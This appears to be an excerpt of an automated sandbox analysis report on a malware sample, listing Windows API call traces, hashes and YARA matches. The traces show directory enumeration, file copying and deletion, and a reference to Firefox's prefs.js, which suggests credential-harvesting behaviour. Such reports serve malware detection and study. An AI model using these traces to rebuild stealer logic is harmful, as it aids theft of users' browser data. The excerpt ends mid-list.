                                            • Opcode ID: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                            • Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
                                            • Opcode Fuzzy Hash: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                            • Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96
                                            APIs
                                            • wsprintfA.USER32 ref: 023F4B93
                                            • FindFirstFileA.KERNEL32(?,?), ref: 023F4BAA
                                            • StrCmpCA.SHLWAPI(?,00420FDC), ref: 023F4BD8
                                            • StrCmpCA.SHLWAPI(?,00420FE0), ref: 023F4BEE
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 023F4DE4
                                            • FindClose.KERNEL32(000000FF), ref: 023F4DF9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextwsprintf
                                            • String ID:
                                            • API String ID: 180737720-0
                                            • Opcode ID: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                            • Instruction ID: f45c130a34b478bd428de223567a92605c1c17b6f52dc6f3214b18cdcee97984
                                            • Opcode Fuzzy Hash: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                            • Instruction Fuzzy Hash: 4B6167B5540218BBCB34EBE0ED44FEA73BDFB49700F004589A74996141EB75AB45CF91
                                            APIs
                                              • Part of subcall function 023FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 023FA9EF
                                              • Part of subcall function 023FAB87: lstrcpy.KERNEL32(00000000,?), ref: 023FABD9
                                              • Part of subcall function 023FAB87: lstrcat.KERNEL32(00000000), ref: 023FABE9
                                              • Part of subcall function 023FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 023FAC2C
                                              • Part of subcall function 023FAC17: lstrcpy.KERNEL32(00000000), ref: 023FAC6B
                                              • Part of subcall function 023FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 023FAC79
                                              • Part of subcall function 023FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 023FAB6C
                                            • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 023EC15C
                                            • StrCmpCA.SHLWAPI(?,004213F8), ref: 023EC1B4
                                            • StrCmpCA.SHLWAPI(?,004213FC), ref: 023EC1CA
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 023ECA26
                                            • FindClose.KERNEL32(000000FF), ref: 023ECA38
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                            • String ID:
                                            • API String ID: 3334442632-0
                                            • Opcode ID: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                            • Instruction ID: 4c1857b2342d080744d1d639cd49a5962f28cbf5f6d213756eb067e7941b17c5
                                            • Opcode Fuzzy Hash: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                            • Instruction Fuzzy Hash: BF420372910218ABCF64FBB0ED55EEE737AAF54300F404569A60EA6190EF349B4DCF51
                                            APIs
                                            • wsprintfA.USER32 ref: 00413EC3
                                            • FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
                                            • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
                                            • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
                                            • FindClose.KERNEL32(000000FF), ref: 00414081
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextwsprintf
                                            • String ID: %s\%s
                                            • API String ID: 180737720-4073750446
                                            • Opcode ID: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                            • Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
                                            • Opcode Fuzzy Hash: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                            • Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 023F47E7
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 023F47EE
                                            • wsprintfA.USER32 ref: 023F480D
                                            • FindFirstFileA.KERNEL32(?,?), ref: 023F4824
                                            • StrCmpCA.SHLWAPI(?,00420FC4), ref: 023F4852
                                            • StrCmpCA.SHLWAPI(?,00420FC8), ref: 023F4868
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 023F48F2
                                            • FindClose.KERNEL32(000000FF), ref: 023F4907
                                            • lstrcat.KERNEL32(?,0064A524), ref: 023F492C
                                            • lstrcat.KERNEL32(?,0064A22C), ref: 023F493F
                                            • lstrlen.KERNEL32(?), ref: 023F494C
                                            • lstrlen.KERNEL32(?), ref: 023F495D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                            • String ID:
                                            • API String ID: 671575355-0
                                            • Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                            • Instruction ID: 7ec16a7bc4e1a464873e2d631dbbf3b36cf573b27b1fbd065f524feb1ca967bd
                                            • Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                            • Instruction Fuzzy Hash: 7D5184B9580218ABCB74EBF0ED89FEE737DAB58700F404588E74992190DB759B84CF91
                                            APIs
                                            • wsprintfA.USER32 ref: 023F412A
                                            • FindFirstFileA.KERNEL32(?,?), ref: 023F4141
                                            • StrCmpCA.SHLWAPI(?,00420FAC), ref: 023F416F
                                            • StrCmpCA.SHLWAPI(?,00420FB0), ref: 023F4185
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 023F42D3
                                            • FindClose.KERNEL32(000000FF), ref: 023F42E8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextwsprintf
                                            • String ID:
                                            • API String ID: 180737720-0
                                            • Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                            • Instruction ID: 556e2dbf9ebb36f95c0bb36d5ab466cc9de89b24e973574b103e811100154ab4
                                            • Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                            • Instruction Fuzzy Hash: 5E5173B5900218BBCB24FBF0ED85EEA737DBB48300F004599A74992080DB75DB89CF95
                                            APIs
                                            • wsprintfA.USER32 ref: 0040ED3E
                                            • FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
                                            • StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
                                            • StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
                                            • FindClose.KERNEL32(000000FF), ref: 0040F2C3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextwsprintf
                                            • String ID: %s\*.*
                                            • API String ID: 180737720-1013718255
                                            • Opcode ID: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                            • Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
                                            • Opcode Fuzzy Hash: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                            • Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
                                            • StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
                                            • StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
                                            • FindClose.KERNEL32(000000FF), ref: 0040E3F2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                            • String ID: 4@$\*.*
                                            • API String ID: 2325840235-1993203227
                                            • Opcode ID: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                            • Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
                                            • Opcode Fuzzy Hash: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                            • Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                                            • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                                            • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                                            • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                            • String ID: prefs.js
                                            • API String ID: 3334442632-3783873740
                                            • Opcode ID: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                            • Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
                                            • Opcode Fuzzy Hash: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                            • Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425114,?,00401F2C,?,004251BC,?,?,00000000,?,00000000), ref: 00401923
                                            • StrCmpCA.SHLWAPI(?,00425264), ref: 00401973
                                            • StrCmpCA.SHLWAPI(?,0042530C), ref: 00401989
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
                                            • DeleteFileA.KERNEL32(00000000), ref: 00401DCA
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
                                            • FindClose.KERNEL32(000000FF), ref: 00401E32
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                            • String ID: \*.*
                                            • API String ID: 1415058207-1173974218
                                            • Opcode ID: 6b77bc6ce782c52a4be10e050969eba881b4cf3ff4cfc38040b618d0c041b4e5
                                            • Instruction ID: fa2d6fe3b05614b5a30e4509255bbbb1abe281ca63e4f804ed0983082d36a12e
                                            • Opcode Fuzzy Hash: 6b77bc6ce782c52a4be10e050969eba881b4cf3ff4cfc38040b618d0c041b4e5
                                            • Instruction Fuzzy Hash: 681260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
                                            APIs
                                            • wsprintfA.USER32 ref: 023EEFA5
                                            • FindFirstFileA.KERNEL32(?,?), ref: 023EEFBC
                                            • StrCmpCA.SHLWAPI(?,00421538), ref: 023EF012
                                            • StrCmpCA.SHLWAPI(?,0042153C), ref: 023EF028
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 023EF515
                                            • FindClose.KERNEL32(000000FF), ref: 023EF52A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextwsprintf
                                            • String ID:
                                            • API String ID: 180737720-0
                                            • Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                            • Instruction ID: 28aa2f291871c3516756ae3b68dd1cabda19d45bef011200cc4c15c6c9d467cf
                                            • Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                            • Instruction Fuzzy Hash: DDE1BD729112189ADFA8FB60ED51EEE733AAF54300F4041D9B60E62591EF706F89CF51
                                            APIs
                                              • Part of subcall function 023FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 023FA9EF
                                              • Part of subcall function 023FAB87: lstrcpy.KERNEL32(00000000,?), ref: 023FABD9
                                              • Part of subcall function 023FAB87: lstrcat.KERNEL32(00000000), ref: 023FABE9
                                              • Part of subcall function 023FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 023FAC2C
                                              • Part of subcall function 023FAC17: lstrcpy.KERNEL32(00000000), ref: 023FAC6B
                                              • Part of subcall function 023FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 023FAC79
                                              • Part of subcall function 023FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 023FAB6C
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 023EDD52
                                            • StrCmpCA.SHLWAPI(?,004214B4), ref: 023EDD9A
                                            • StrCmpCA.SHLWAPI(?,004214B8), ref: 023EDDB0
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 023EE033
                                            • FindClose.KERNEL32(000000FF), ref: 023EE045
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                            • String ID:
                                            • API String ID: 3334442632-0
                                            • Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                            • Instruction ID: 3ed108ab1681e61e776ebfef865fcbcc1f9b60ea3491e1d3a33239f630bfdb52
                                            • Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                            • Instruction Fuzzy Hash: 199144729002189BCF64FBB0ED55DEE737EAF95300F008669A94E96190EE349B5C8F91
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
                                            • StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
                                            • StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
                                            • FindClose.KERNEL32(000000FF), ref: 0040DDDE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                            • String ID:
                                            • API String ID: 3334442632-0
                                            • Opcode ID: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                            • Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
                                            • Opcode Fuzzy Hash: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                            • Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A
                                            APIs
                                              • Part of subcall function 023FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 023FA9EF
                                              • Part of subcall function 023FAB87: lstrcpy.KERNEL32(00000000,?), ref: 023FABD9
                                              • Part of subcall function 023FAB87: lstrcat.KERNEL32(00000000), ref: 023FABE9
                                              • Part of subcall function 023FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 023FAC2C
                                              • Part of subcall function 023FAC17: lstrcpy.KERNEL32(00000000), ref: 023FAC6B
                                              • Part of subcall function 023FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 023FAC79
                                              • Part of subcall function 023FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 023FAB6C
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 023EF985
                                            • StrCmpCA.SHLWAPI(?,004215BC), ref: 023EF9D6
                                            • StrCmpCA.SHLWAPI(?,004215C0), ref: 023EF9EC
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 023EFD18
                                            • FindClose.KERNEL32(000000FF), ref: 023EFD2A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                            • String ID:
                                            • API String ID: 3334442632-0
                                            • Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                            • Instruction ID: ab25b1d51297d622963832c4a6a55ceb51f46fa9ec7775eabc0ce9778007e098
                                            • Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                            • Instruction Fuzzy Hash: A7B11E719002189BCF74FF60EDA5EEE737AAF55300F4081A9A54E96590EF309B49CF91
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D73), ref: 0040E4A2
                                            • StrCmpCA.SHLWAPI(?,004214F8), ref: 0040E4F2
                                            • StrCmpCA.SHLWAPI(?,004214FC), ref: 0040E508
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040EBDF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                            • String ID: \*.*$@
                                            • API String ID: 433455689-2355794846
                                            • Opcode ID: f66feada1159486c5f539b2798b5b41736558756ad5056c64c98908e290d890f
                                            • Instruction ID: 32b04220dc81db1066fec36fe382e2e0147ddb409d88bf53f78a4e8ff9751907
                                            • Opcode Fuzzy Hash: f66feada1159486c5f539b2798b5b41736558756ad5056c64c98908e290d890f
                                            • Instruction Fuzzy Hash: 2612D5719111189ACB14FB71DD96EED7338AF54314F4045AEB00A62091EF386FDACFAA
                                            APIs
                                              • Part of subcall function 023FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 023FA9EF
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425114,?,?,?,004251BC,?,?,00000000,?,00000000), ref: 023E1B8A
                                            • StrCmpCA.SHLWAPI(?,00425264), ref: 023E1BDA
                                            • StrCmpCA.SHLWAPI(?,0042530C), ref: 023E1BF0
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 023E1FA7
                                            • DeleteFileA.KERNEL32(00000000), ref: 023E2031
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 023E2087
                                            • FindClose.KERNEL32(000000FF), ref: 023E2099
                                              • Part of subcall function 023FAB87: lstrcpy.KERNEL32(00000000,?), ref: 023FABD9
                                              • Part of subcall function 023FAB87: lstrcat.KERNEL32(00000000), ref: 023FABE9
                                              • Part of subcall function 023FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 023FAC2C
                                              • Part of subcall function 023FAC17: lstrcpy.KERNEL32(00000000), ref: 023FAC6B
                                              • Part of subcall function 023FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 023FAC79
